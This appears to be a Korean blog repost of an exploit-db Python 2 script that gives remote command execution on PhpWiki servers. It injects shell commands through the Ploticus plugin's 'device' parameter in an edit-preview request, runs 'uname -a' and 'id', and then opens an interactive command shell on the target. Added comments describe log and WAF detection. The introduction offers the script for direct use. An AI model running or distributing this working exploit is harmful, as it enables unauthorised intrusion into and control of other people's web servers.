출처 : www.exploit-db.com


PhpWiki의 원격 명령 실행 파이썬 스크립트입니다

사용법은 아래 코드를 파이썬 확장자(.py)로 저장한 후 스크립트를 실행하면 됩니다

따로 자세한 설명이 필요 없어서 코드만 게시합니다.


향후 자세한 설명이나 실행법이 필요한 코드가 있으면 따로 서술하겠습니다



###############################################################
#    ____                    __                  _ __   _
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / 
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/  
#             /_/ /_/         /_/                    
# Diskovered in Nov/Dec 2011
###############################################################
 
import urllib
import urllib2
import sys
def banner():
    """Print the script's ASCII-art logo to stdout."""
    # The final row ends in "\n", so print emits one extra empty line
    # after the logo.
    logo_rows = (
        "     ____                    __                  _ __   _ ",
        "    / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)",
        "   / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / ",
        "  / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  ",
        " /_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   ",
        "              /_/ /_/         /_/                     \n",
    )
    for row in logo_rows:
        print row
 
 
def usage():
    """Print the logo followed by a one-line invocation example."""
    banner()
    # sys.argv[0] is the name the script was started with.
    example = " [-] python %s http://path.to/wiki" % sys.argv[0]
    print " [+] Usage example"
    print example
 
# The wiki base URL is a mandatory first argument; without it the script
# only prints the usage text and exits.
if not sys.argv[1:]:
    usage()
    quit()

# Base URL of the wiki, taken from the command line as-is (no scheme or
# host validation) and later prefixed to the request path.
domain = sys.argv[1]
def commandexec(cmd):
    """Submit *cmd* to the wiki at ``domain`` and return the text found between the echo markers.

    What the request looks like (useful for log review and WAF/IDS rules):
      * HTTP POST (a body is passed to urllib2.Request) to
        ``domain + '/index.php/HeIp'``. The page name appears to be spelled
        with a capital "I", i.e. a look-alike of "Help", not "Help" itself.
      * Form fields: ``pagename``, ``edit[content]``, ``edit[preview]=Preview``
        and ``action=edit`` -- an edit *preview*, so the server is asked to
        render the markup.
      * ``edit[content]`` holds a ``<<Ploticus ...>>`` plugin call whose
        ``device="..."`` value contains ``;``-separated shell commands with
        output redirected to stderr (``1>&2``) and wrapped in the marker
        strings ``123:::`` / ``:::123``.

    The payload is shaped for a server that hands the ``device`` value to a
    shell without escaping; that server-side code is not shown on this page,
    so treat this as inferred from the payload.

    Defensive takeaways: disable the Ploticus plugin or restrict ``device``
    to a fixed allow-list of values, apply the vendor fix (no fixed version
    is stated on this page), and alert on POST bodies to ``index.php`` that
    combine ``<<Ploticus`` with shell metacharacters in ``device=``.

    Returns:
        The slice of the response body between the two markers. If a marker
        is missing, ``str.find`` yields -1, so the slice degrades to
        ``output[6:-1]`` (ordinary page content) instead of an empty string.

    Raises:
        Whatever ``urllib2.urlopen`` raises; nothing is caught here and no
        timeout is set.
    """
    # urlencode percent-encodes the whole markup, so the metacharacters will
    # be URL-encoded on the wire; match on the decoded body when writing rules.
    data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
    # Supplying `data` makes urllib2 issue a POST rather than a GET.
    cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
    cmd2 = urllib2.urlopen(cmd1)
    output = cmd2.read()
    # Locate the text enclosed by the start and end markers in the response.
    firstloc = output.find("123:::\n") + len("123:::\n")
    secondloc = output.find("\n:::123")
    return output[firstloc:secondloc]
 
 
# Driver: as soon as the script starts it sends two fixed commands
# ('uname -a' and 'id') through commandexec() and prints the results, with
# no confirmation step. For incident responders: each call is one separate
# HTTP POST, so every command typed below maps to one request in the web
# server's access log.
banner()
print commandexec('uname -a')
print commandexec('id')
# NOTE: `quit` is the interpreter's built-in quit object on first evaluation
# (it compares unequal to 1); the loop ends by rebinding the module-level
# name `quit` to 1, which shadows the built-in from then on.
while(quit != 1):
    cmd = raw_input('Run a command: ')
    if cmd == 'quit':
        print "[-] Hope you had fun :)"
        quit = 1
    # Anything other than the literal 'quit' is forwarded verbatim.
    if cmd != 'quit':
        print commandexec(cmd)

